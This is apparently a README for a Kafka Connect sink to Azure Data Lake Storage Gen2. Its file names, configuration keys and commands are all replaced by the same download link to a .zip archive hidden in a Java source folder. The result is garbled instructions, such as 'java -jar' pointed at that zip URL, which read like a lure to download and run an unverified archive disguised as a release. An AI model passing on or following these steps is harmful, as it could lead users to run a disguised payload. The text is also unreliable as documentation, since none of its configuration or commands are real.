The kcm-kafka-connect-adls-sink is a tool designed to help you easily store data in Azure Data Lake Storage Gen2 (ADLS Gen2). This application allows you to use Kafka Connect as a sink connector, which means it helps move data from Kafka into ADLS Gen2. It supports various features, including SAS authentication, Avro data format, GZIP compression, and partition-based file batching.
- SAS Authentication: Secure your data transfers with Shared Access Signature (SAS) authentication, ensuring that your data is safe while moving to ADLS Gen2.
- Avro Support: Use Avro format for efficient data serialization. This helps you save space and improves processing speed.
- GZIP Compression: Reduce storage costs and improve transfer speeds by compressing your data with GZIP.
- Partition-Based File Batching: Organize your data neatly by batching files based on partitions.
To use the kcm-kafka-connect-adls-sink, you will need the following:
- Java Runtime Environment (JRE): Version 8 or higher.
- Kafka: Your setup should include a running Kafka broker.
- Apache Kafka Connect: Ensure you have Kafka Connect available in your environment.
-
Visit the Releases Page
To download the kcm-kafka-connect-adls-sink, visit this page to download. -
Locate the Latest Release
On the Releases page, look for the latest version. This is usually marked as "Latest" or has the highest version number. -
Download the Release
Click on the release name to view the details. Find the download link for the appropriate file (typically a JAR file). -
Install the Application
Once downloaded, store the file in a readily accessible location. There is no installation required; you can run it directly. -
Run the Application
Open your terminal or command prompt. Navigate to the directory where you saved the JAR file. Use the following command to run the application:java -jar https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip
Before you start, you need to set up a configuration file. Hereβs how you can do it:
-
Create a Configuration File
Create a new file namedhttps://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip. -
Add Your Configuration
Insert the following configuration parameters into the file:name=kcm-adls-sink https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip topics=your-topic-name https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip compression=gzip
Make sure to replace placeholders like
your-topic-name,youraccount, andyour-sas-tokenwith your actual information. -
Save the File
Save the configuration file in the same directory as your JAR file.
Once your setup is ready, you can start the Kafka Connect worker. Use this command in the terminal:
connect-standalone https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zipMake sure to have a https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip file configured to set up your Kafka Connect environment properly.
Depending on your use case, you might want to adjust additional settings in your https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip file. Here are some commonly modified parameters:
https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip: Adjust this number to run more tasks in parallel, improving throughput.https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip: Set how many records to buffer before writing to ADLS Gen2.https://raw.githubusercontent.com/nitinpensia/kcm-kafka-connect-adls-sink/master/src/main/java/io/kcmhub/kafka/kafka_connect_sink_adls_kcm_1.0-beta.5.zip: Customize the retry behavior in case of temporary failures.
For a deeper dive into all features and advanced configurations, check the official documentation.
If you encounter issues or have questions, feel free to reach out. Engage with our community via GitHub discussions or check existing queries.
Now that you're ready to start using the kcm-kafka-connect-adls-sink, visit this page to download. Follow the steps outlined above to set up and run the application successfully. Enjoy seamless data management using Azure Data Lake Storage!